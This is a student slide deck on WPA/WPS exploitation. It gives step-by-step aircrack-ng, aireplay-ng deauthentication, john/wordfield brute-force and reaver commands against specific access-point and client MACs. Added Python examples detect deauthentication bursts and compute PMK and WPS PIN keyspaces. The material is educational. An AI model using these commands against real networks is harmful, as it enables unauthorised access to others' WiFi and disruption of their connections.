Exploiting WiFi Security
DESCRIPTION
This slide deck is about WiFi security exploitation.
TRANSCRIPT
WPA EXPLOITATION IN THE WORLD OF WIRELESS NETWORK
By Hariraj Rathod, 8th sem
Department of Electronics and Communication
WIFI – WIRELESS FIDELITY
Wi-Fi is a popular technology that allows an electronic device to exchange data or connect to the internet wirelessly using radio waves.
Wireless access allows users to connect to the internet from any location within range of a wireless access point.
SOME BASIC TERMS
MAC address or physical address is a unique identifier assigned to network interfaces for communications
Access point >> Wireless router
SSID (service set identifier) >> Network Name
BSSID (basic service set identification ) >> MAC address of the access point
BASIC WORKING
When a user uses wireless internet they generate what are called data “packets”.
Packets are transmitted between the wireless card and the wireless access point via radio waves whenever the computer is connected with the access point.
BASIC WORKING CONTD.
Depending on how long the computer is connected, it can generate a certain number of packets per day.
The more users that are connected to one access point, the more packets are generated.
WIRELESS USES RADIO FREQUENCY
2.4 GHz WiFi spectrum
WIRELESS ENCRYPTION
The main source of vulnerability in wireless networks is the encryption method. The different types of wireless encryption are as follows:
WEP
WPA
WPA2
WEP
Stands for Wired Equivalent Privacy.
WEP is recognizable by its key of 10 or 26 hexadecimal digits.
The WEP protocol was not developed by researchers or experts in security and cryptography.
The initial bytes of the key stream depend on just a few bits of the encryption key.
WEP CONTINUED
WEP Encryption Process
ICV: 32-bit integrity check value
IV: initialization vector
WEP CONTINUED
WEP Decryption Process
With multiple wireless clients sending a large amount of data, an attacker can remotely capture large amounts of WEP ciphertext and use cryptanalysis methods to determine the WEP key.
WPA OR WPA2
Stands for Wi-Fi Protected Access.
Created to provide stronger security.
Still able to be cracked if a short password is used.
If a long passphrase or password is used, these protocols are virtually uncrackable.
WPA-PSK with TKIP (Temporal Key Integrity Protocol) or AES (Advanced Encryption Standard) uses a pre-shared key (PSK) that is more than 7 and less than 64 characters in length.
WPS (Wi-Fi Protected Setup) is a simple plug-and-play feature.
USING BACKTRACK >>
Some basic Backtrack terms >>
wlan1 – wireless interface
mon0 – monitor-mode interface
Handshake – refers to the negotiation process between the computer and a WiFi server using WPA encryption. Needed to crack WPA/WPA2.
Dictionary – a list of common passwords.
.cap file – used to store captured packets.
MONITOR MODE
Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received from the wireless network.
Monitor mode allows packets to be captured without having to associate with an access point first.
TOOLS USED
Airmon-ng >> Places wireless cards in monitor mode.
Airodump-ng (packet sniffer) >> Tool used to listen to wireless routers in the area.
Aireplay-ng (packet injector) >> Used to inject frames. Its primary function is to generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys.
Aircrack-ng >> Cracks WEP and WPA (dictionary attack) keys.
TOOLS USED CONTINUED
Word Field (brute force)
Reaver tool (brute force)
AIRCRACK-NG
Selecting the interface and putting it in monitor mode. Command used:
airmon-ng start wlan1
AIRCRACK-NG CONTINUED
Start capturing packets:
airodump-ng mon0
airodump-ng mon0 --channel 1 --bssid <mac id> -w reddot
AIRCRACK-NG CONTINUED
Deauthenticate the device connected to the access point and force it to re-exchange the WPA key.
aireplay-ng -0 4 -a F4:EC:38:BA:6C:44 -c 90:4C:E5:B2:6F:D8 mon0
where "-0 4" tells aireplay-ng to inject deauthentication packets (4 of them), "-a" is the wireless access point MAC address and "-c" is the client (victim) MAC address.
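The deauthentication step above is also what a wireless IDS watches for. The following is an added example (not from the slides): a small Python detector that decodes 802.11 management headers and flags a burst of deauth/disassoc frames aimed at one client, run here on constructed in-memory frames built from the page's AP and client MACs; the frame builder, the frame mix and the alert threshold are assumptions for the demo.

```python
import struct
from collections import Counter

# 802.11 frame-control type/subtype values for the frames of interest
TYPE_MGMT = 0
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12

def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))

def parse_80211_header(frame: bytes) -> dict:
    """Decode the 24-byte 802.11 MAC header (raw frame, no radiotap prefix)."""
    fc, _duration = struct.unpack_from("<HH", frame, 0)
    return {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "addr1": frame[4:10].hex(":"),    # receiver / destination
        "addr2": frame[10:16].hex(":"),   # transmitter / source
        "addr3": frame[16:22].hex(":"),   # BSSID in management frames
        "body": frame[24:],               # frame body after sequence control
    }

def make_test_frame(ftype: int, subtype: int, dst: str, src: str, bssid: str, body: bytes = b"") -> bytes:
    """Build a minimal raw frame as constructed test input for the detector."""
    fc = (ftype << 2) | (subtype << 4)
    header = struct.pack("<HH", fc, 0) + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
    return header + struct.pack("<H", 0) + body   # sequence control = 0

def deauth_alerts(frames, threshold: int = 3) -> dict:
    """Return (bssid, target, reason) keys seen in >= threshold deauth/disassoc frames."""
    counts = Counter()
    for frame in frames:
        h = parse_80211_header(frame)
        if h["type"] == TYPE_MGMT and h["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            reason = struct.unpack_from("<H", h["body"], 0)[0]   # 2-byte reason code
            counts[(h["addr3"], h["addr1"], reason)] += 1
    return {key: n for key, n in counts.items() if n >= threshold}

# Constructed sample: the slides' AP and client MACs; four deauths with reason code 7
# (class 3 frame from non-associated station, the code aireplay-ng sends) mixed with
# a beacon and a data frame, mirroring "aireplay-ng -0 4" above.
AP, CLIENT = "f4:ec:38:ba:6c:44", "90:4c:e5:b2:6f:d8"
SAMPLE_FRAMES = [
    make_test_frame(TYPE_MGMT, 8, "ff:ff:ff:ff:ff:ff", AP, AP),                       # beacon
    *[make_test_frame(TYPE_MGMT, SUBTYPE_DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7)) for _ in range(4)],
    make_test_frame(2, 0, AP, CLIENT, AP, b"payload"),                                 # data frame
]

if __name__ == "__main__":
    print(deauth_alerts(SAMPLE_FRAMES))   # {('f4:ec:38:ba:6c:44', '90:4c:e5:b2:6f:d8', 7): 4}
```

In practice the frames come from a monitor-mode capture such as airodump-ng's .cap output; enabling 802.11w Protected Management Frames on the access point makes forged deauth frames fail integrity checking instead of merely raising an alert.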
AIRCRACK-NG CONTINUED
Authentication process in WPA
AIRCRACK-NG CONTINUED
The 4-way handshake is captured.
AIRCRACK-NG CONTINUED
Cracking the WPA key using aircrack-ng, a dictionary file and the captured 4-way handshake file reddot-01.cap:
aircrack-ng -w /home/pranav/download/password.lst -b F4:EC:38:BA:6C:44 /home/pranav/reddot-01.cap
where "-w" specifies the dictionary file to use and "-b" the BSSID of the target access point.
JOHN THE RIPPER
Faster than the previously used tool. Located at /pentest/password/john-1.7.6.jumbo12/run/
john --stdout --incremental=All | aircrack-ng -b 00:17:9A:82:44:1B -w - /home/pranav/test-01.cap
WORD FIELD
Word Field is used for a brute-force attack. Command line: wordfield [OPTION...] MINLENGTH [MAXLENGTH]
"wordfield -a -n 8 8" will output all possible alphanumeric strings which are 8 characters long.
wordfield -a -n 8 8 | aircrack-ng -b 00:17:9A:82:44:1B -w - /home/pranav/Wifire-02.cap
This attack is really effective on weak keys.
WORD FIELD CONTINUED
The run shown below took 22 hours, 7 minutes and 35 seconds.
DICTIONARY AND BRUTE FORCE LIMITATIONS
The passphrase will not necessarily be found in a dictionary list, so the dictionary approach has its limitations.
Brute-force techniques require a lot of fast computational hardware.
Source: http://lastbit.com/pswcalc.asp
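To make the word-field and dictionary limitations concrete, here is an added example (not from the slides) that derives the WPA/WPA2 pairwise master key the way aircrack-ng must for every candidate, and uses the 62^8 keyspace of "wordfield -a -n 8 8" to estimate search time. The 100,000 PMK/s cracking rate is an assumed figure; the passphrase/SSID pair "password"/"IEEE" is the published 802.11i test vector.

```python
import hashlib
from math import log2

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key (IEEE 802.11i): PBKDF2-HMAC-SHA1 with the
    SSID as salt, 4096 iterations, 256-bit output. A dictionary or brute-force
    attack has to repeat this for every candidate, which bounds its speed."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, dklen=32)

def keyspace_size(alphabet_size: int, length: int) -> int:
    """Candidates an exhaustive generator such as 'wordfield -a -n 8 8' emits
    (62 alphanumeric symbols, length 8)."""
    return alphabet_size ** length

def exhaustive_search_years(alphabet_size: int, length: int, pmk_per_second: float) -> float:
    """Worst-case wall-clock time to try the whole keyspace at a given PMK rate."""
    seconds = keyspace_size(alphabet_size, length) / pmk_per_second
    return seconds / (365 * 86400)

def passphrase_entropy_bits(alphabet_size: int, length: int) -> float:
    """Entropy of a uniformly random passphrase drawn from the alphabet."""
    return length * log2(alphabet_size)

if __name__ == "__main__":
    # Published 802.11i test vector: passphrase "password", SSID "IEEE"
    print(wpa_pmk("password", "IEEE").hex())
    # Same passphrase, different SSID: a PMK table precomputed for one SSID is useless for another
    print(wpa_pmk("password", "IEEE") != wpa_pmk("password", "ieee"))
    # Assumed cracking rate of 100,000 PMK/s (constructed figure, not from the slides)
    print(round(exhaustive_search_years(62, 8, 100_000)))   # about 69 years
    print(round(passphrase_entropy_bits(62, 20)))           # 119 bits
```

The SSID-as-salt detail is why a non-default SSID plus a long random passphrase defeats both precomputed PMK tables and the exhaustive search the slides time at 22 hours for a weak key.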
REAVER TOOL.
Reaver is a fantastic tool for cracking the WPS PIN, written by Craig Heffner.
This tool exploits the 8-digit WPS PIN. One digit is a checksum digit, leaving 7 unknown digits, meaning there are 10^7 (10,000,000) possible combinations, which will take approximately 116 days to break at 1 attempt every second.
REAVER TOOL CONTINUED
WPS PIN 65020920
REAVER TOOL CONTINUED
Finding a WPS victim:
wash -i mon0
REAVER TOOL CONTINUED: CRACKING TECHNIQUE
The WPS PIN is checked in two halves, 6502-0920. The first half has 10^4 (10,000) combinations. In the second half one digit is the checksum digit, so its combinations reduce to 10^3 (1,000). This reduces the time required to break the PIN to just over 3 hours, again assuming that 1 attempt is made every second.
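The PIN arithmetic above can be checked directly. This added example (not from the slides) computes the WPS PIN checksum digit, validates the slides' PIN 65020920, and compares the number of guesses when the whole PIN is answered at once against the split verification Reaver relies on; it is meant to quantify why WPS PIN entry should be disabled on an access point, and the one-attempt-per-second rate is the slides' own assumption.

```python
def wps_checksum(first_seven: str) -> int:
    """Checksum digit of an 8-digit WPS PIN (Wi-Fi Simple Configuration):
    odd-position digits weighted 3, even-position digits weighted 1, mod 10."""
    d = [int(c) for c in first_seven]
    if len(d) != 7:
        raise ValueError("expected the first 7 digits of the PIN")
    accum = 3 * (d[0] + d[2] + d[4] + d[6]) + (d[1] + d[3] + d[5])
    return (10 - accum % 10) % 10

def is_valid_wps_pin(pin: str) -> bool:
    """True if the PIN is 8 digits and its last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])

def worst_case_attempts(halves_verified_separately: bool) -> int:
    """Guesses needed to exhaust the PIN space. With one yes/no answer for the
    whole PIN, 7 free digits give 10^7. When the exchange reveals whether each
    half is correct on its own (the weakness Reaver uses), it is 10^4 for the
    first half plus 10^3 for the second, whose last digit is fixed by the checksum."""
    return 10**4 + 10**3 if halves_verified_separately else 10**7

def hours_to_exhaust(attempts: int, attempts_per_second: float = 1.0) -> float:
    """Wall-clock hours for the worst case at a given guess rate."""
    return attempts / attempts_per_second / 3600

if __name__ == "__main__":
    print(is_valid_wps_pin("65020920"))                        # the slides' PIN: True
    print(hours_to_exhaust(worst_case_attempts(False)) / 24)   # about 115.7 days
    print(hours_to_exhaust(worst_case_attempts(True)))         # about 3.06 hours
```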
REAVER TOOL CONTINUED
reaver -i mon0 -b F4:EC:38:BA:6C:44
REAVER TOOL CONTINUED
BE SECURED
THANKS : )